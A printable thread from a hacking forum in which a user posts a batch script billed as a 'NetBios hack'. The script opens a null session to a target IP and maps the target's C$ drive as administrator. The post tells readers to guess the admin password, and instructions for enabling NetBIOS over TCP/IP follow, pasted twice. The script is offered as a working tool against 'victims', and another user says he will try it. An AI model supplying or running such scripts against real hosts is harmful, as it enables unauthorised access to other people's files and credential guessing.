Sinisterly
Batch file that hacks NetBios - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: Batch file that hacks NetBios (/Thread-Batch-file-that-hacks-NetBios)



Batch file that hacks NetBios - TheBeanhacker - 03-27-2012

the title is kinda self explanitory, this is a rather simple batch file but when you enter the ip address of a target it copies the targets C: into a new drive in youe "My Computer" folder, for this to work you must know the admin's password, it shouldn't be too hard to guess as most people dont know how to access the real admin account and have therefore not created a custom password for it.

The Code

@echo off
title Netbios Hack
echo Do you wish to proceed with netbios hack?
set /p var=
if %var%==yes goto proceed
if %var%==YES goto proceed
if %var%==no goto exit
if %var%==NO goto exit
cls
:exit
exit

:proceed
echo Please enter IP address to be hacked:
set /p IP=

net use \\%IP%\ipc$ "" /u:""

net use * \\%IP%\c$ * /u:administrator
echo NetBios hack complete, check in the computer folder for new driver
press any key to exit
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:

goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties

(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:

goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties

(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
ignore that last bit clicked CTRL-V accidentally


RE: Batch file that hacks NetBios - Shining White - 03-27-2012

i should check this up really Smile


RE: Batch file that hacks NetBios - TheBeanhacker - 03-27-2012

go on then i can guaruntee you that it will work on my behalf but the rest is up to weather you can find a computer with port 139 open and you have to have a fast connection